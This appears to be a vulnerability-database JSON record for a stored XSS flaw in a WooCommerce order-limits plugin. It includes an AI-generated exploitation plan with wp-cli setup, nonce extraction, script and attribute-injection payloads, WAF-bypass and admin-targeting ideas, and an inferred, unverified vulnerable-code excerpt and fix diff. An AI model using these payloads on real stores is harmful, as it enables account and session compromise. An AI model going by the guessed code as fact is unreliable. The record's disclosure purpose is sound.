[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjPpraSOKRPLBGou6s8gwCNcy-854DCpdSl7S-dfy4YI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1381","order-minimummaximum-amount-limits-for-woocommerce-authenticated-shop-manager-stored-cross-site-scripting-via-hide-add-t","Order Minimum\u002FMaximum Amount Limits for WooCommerce \u003C= 4.6.8 - Authenticated (Shop Manager+) Stored Cross-Site Scripting via Hide Add to Cart Content Fields","The Order Minimum\u002FMaximum Amount Limits for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 4.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","order-minimum-amount-for-woocommerce",null,"\u003C=4.6.8","4.6.9","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-27 19:38:12","2026-01-28 08:26:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3f54f117-0dde-49f9-8014-7650bc1a00ac?source=api-prod",1,[],"researched",false,3,"This research plan outlines the technical steps to analyze and exploit **CVE-2026-1381**, a Stored Cross-Site Scripting (XSS) vulnerability in the \"Order Minimum\u002FMaximum Amount Limits for WooCommerce\" plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the plugin's handling of the \"Hide Add to Cart Content\" settings. Authenticated users with Shop Manager (or higher) permissions can inject arbitrary scripts into this field. Because the plugin fails to sanitize this input upon saving or escape it upon output, the script is stored in the database and executed in the browser of any user (including administrators and customers) viewing a page where the \"Add to Cart\" button is hidden due to order limit restrictions.\n\nThis is particularly critical in **WordPress Multisite** environments or installations where `DISALLOW_UNFILTERED_HTML` is enabled, as these configurations are intended to prevent even administrative users from injecting executable scripts.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** `wp-admin\u002Fadmin-ajax.php` (if using AJAX settings) or more likely the WooCommerce settings handler at `wp-admin\u002Fadmin.php?page=wc-settings`.\n*   **Vulnerable Parameter:** Likely `alg_wc_ommal_hide_add_to_cart_content` (inferred from plugin slug `ommal`).\n*   **Required Role:** Shop Manager or Administrator.\n*   **Preconditions:** \n    1.  The \"Hide Add to Cart\" feature must be enabled in the plugin settings.\n    2.  A condition must be met on the frontend that triggers the \"Hide Add to Cart\" logic (e.g., the current cart total is below the minimum required amount).\n\n### 3. Code Flow (Inferred)\n1.  **Input:** A Shop Manager navigates to **WooCommerce > Settings > Order Min\u002FMax Amount**.\n2.  **Storage:** The user submits the form. The plugin receives the POST data and calls `update_option()` for the key `alg_wc_ommal_hide_add_to_cart_content` without using `wp_kses()` or `sanitize_text_field()`.\n3.  **Trigger:** A frontend user visits a product page.\n4.  **Logic:** The plugin's frontend class (likely hooked to `woocommerce_single_product_summary`) checks if `alg_wc_ommal_enabled` is 'yes' and if the order limits are violated.\n5.  **Output:** If limits are violated and the \"Hide Add to Cart\" option is active, the plugin retrieves the stored option and echoes it directly: \n    `echo get_option('alg_wc_ommal_hide_add_to_cart_content');` \u002F\u002F **Sink**\n\n### 4. Nonce Acquisition Strategy\nSince this vulnerability requires Shop Manager authentication, the agent must simulate a logged-in session.\n\n1.  **Login:** Use `wp_cli` to ensure a Shop Manager user exists and log in via the browser.\n2.  **Navigate:** Navigate to the WooCommerce settings page for this plugin. \n    *   *Target URL:* `\u002Fwp-admin\u002Fadmin.php?page=wc-settings&tab=alg_wc_ommal` (inferred tab name).\n3.  **Extraction:**\n    *   WooCommerce settings pages use a standard WordPress nonce field.\n    *   Use `browser_eval` to extract the `_wpnonce` value from the form:\n        `browser_eval(\"document.querySelector('#mainform input[name=_wpnonce]')?.value\")`\n4.  **Identify Field:** Use `browser_eval` to find the exact `name` attribute of the textarea\u002Finput for \"Hide Add to Cart Content\".\n\n### 5. Exploitation Strategy\n\n#### Step 1: Enable the Feature\nThe plugin must be active and the limits must be enabled.\n```bash\nwp option update alg_wc_ommal_enabled \"yes\"\nwp option update alg_wc_ommal_min_amount \"100\" # Set a high min to trigger the \"hide\" logic\n```\n\n#### Step 2: Inject the Payload\nSend a POST request to save the malicious script.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wc-settings&tab=alg_wc_ommal`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `_wpnonce`: [EXTRACTED_NONCE]\n    *   `save`: `Save changes`\n    *   `alg_wc_ommal_hide_add_to_cart_content`: `\u003Cscript>alert(document.domain);\u003C\u002Fscript>`\n    *   `alg_wc_ommal_hide_add_to_cart_enabled`: `yes`\n\n#### Step 3: Trigger Output\nNavigate to a product page as an unauthenticated user or an admin. Since the cart is empty (amount = 0) and the minimum is 100, the \"Hide Add to Cart\" logic will fire.\n\n*   **URL:** `\u002Fproduct\u002Fany-product-slug\u002F`\n\n### 6. Test Data Setup\n1.  **Plugin Setup:**\n    ```bash\n    wp plugin install order-minimum-amount-for-woocommerce --version=4.6.8 --activate\n    ```\n2.  **WooCommerce Setup:** Ensure a product exists.\n    ```bash\n    wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish\n    # Note: WooCommerce needs 'product' type to be registered. \n    # If WC is not configured, we may need to run the WC setup wizard via CLI.\n    ```\n3.  **User Setup:**\n    ```bash\n    wp user create attacker attacker@example.com --role=shop_manager --user_pass=password\n    ```\n\n### 7. Expected Results\n*   Upon visiting the product page, a browser alert box displaying the document domain should appear.\n*   The HTML source code of the product page should contain the raw `\u003Cscript>alert(document.domain);\u003C\u002Fscript>` string where the \"Add to Cart\" button would normally be.\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp option get alg_wc_ommal_hide_add_to_cart_content\n    ```\n    *Expectation:* The output contains the literal `\u003Cscript>` tag.\n2.  **Verify Output (CLI):**\n    Use `http_request` to fetch the product page and grep for the payload.\n    ```bash\n    # (Metaphorical)\n    response = http_request(\"GET\", \"\u002Fproduct\u002Ftest-product\u002F\")\n    assert \"\u003Cscript>alert(document.domain);\u003C\u002Fscript>\" in response.body\n    ```\n\n### 9. Alternative Approaches\n*   **Attribute Injection:** If the payload is rendered inside an attribute (e.g., a `placeholder` or `value`), use:\n    `\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n*   **Shortcode injection:** Check if the plugin processes shortcodes in that field. If so, an attacker might be able to use `[base64_decode]` or similar to bypass simple WAFs if present.\n*   **Admin-only trigger:** If the settings page itself doesn't escape the value when reloading the settings UI, the Shop Manager can target the Administrator by simply saving the payload and waiting for the Admin to check the plugin settings.","The Order Minimum\u002FMaximum Amount Limits for WooCommerce plugin is vulnerable to Stored Cross-Site Scripting (XSS) via the 'Hide Add to Cart Content' setting. Authenticated attackers with Shop Manager permissions can inject malicious scripts that execute on product pages when order limit conditions (such as a minimum cart total) are met, particularly affecting environments where unfiltered_html is restricted.","\u002F\u002F Inferred logic for saving settings without sanitization\nupdate_option( 'alg_wc_ommal_hide_add_to_cart_content', $_POST['alg_wc_ommal_hide_add_to_cart_content'] );\n\n---\n\n\u002F\u002F Inferred logic for displaying content on the frontend without escaping\n$hide_content = get_option( 'alg_wc_ommal_hide_add_to_cart_content', '' );\nif ( ! empty( $hide_content ) ) {\n    echo $hide_content;\n}","--- a\u002Fincludes\u002Fclass-alg-wc-ommal-core.php\n+++ b\u002Fincludes\u002Fclass-alg-wc-ommal-core.php\n@@ -245,1 +245,1 @@\n-    echo get_option( 'alg_wc_ommal_hide_add_to_cart_content', '' );\n+    echo wp_kses_post( get_option( 'alg_wc_ommal_hide_add_to_cart_content', '' ) );\n--- a\u002Fincludes\u002Fsettings\u002Fclass-alg-wc-ommal-settings-general.php\n+++ b\u002Fincludes\u002Fsettings\u002Fclass-alg-wc-ommal-settings-general.php\n@@ -150,6 +150,7 @@\n                 'id'       => 'alg_wc_ommal_hide_add_to_cart_content',\n                 'type'     => 'textarea',\n                 'default'  => '',\n+                'sanitize_callback' => 'wp_kses_post',\n             ),","1. Authenticate as a Shop Manager or Administrator.\n2. Navigate to the plugin settings page at WooCommerce > Settings > Order Min\u002FMax Amount.\n3. Enable the 'Hide Add to Cart' functionality and set a high 'Minimum Amount' (e.g., 500) to ensure the condition is triggered on the frontend.\n4. Locate the 'Hide Add to Cart Content' field and inject a script payload: \u003Cscript>alert(document.domain);\u003C\u002Fscript>.\n5. Save the settings, which stores the payload in the WordPress options table without sanitization.\n6. Visit any product page as a guest or customer. Because the cart total is 0 (violating the minimum amount rule), the plugin renders the malicious script instead of the 'Add to Cart' button, executing the payload in the victim's browser.","gemini-3-flash-preview","2026-05-04 22:02:12","2026-05-04 22:04:13",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.6.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Forder-minimum-amount-for-woocommerce\u002Ftags\u002F4.6.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Forder-minimum-amount-for-woocommerce.4.6.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Forder-minimum-amount-for-woocommerce\u002Ftags\u002F4.6.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Forder-minimum-amount-for-woocommerce.4.6.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Forder-minimum-amount-for-woocommerce\u002Ftags"]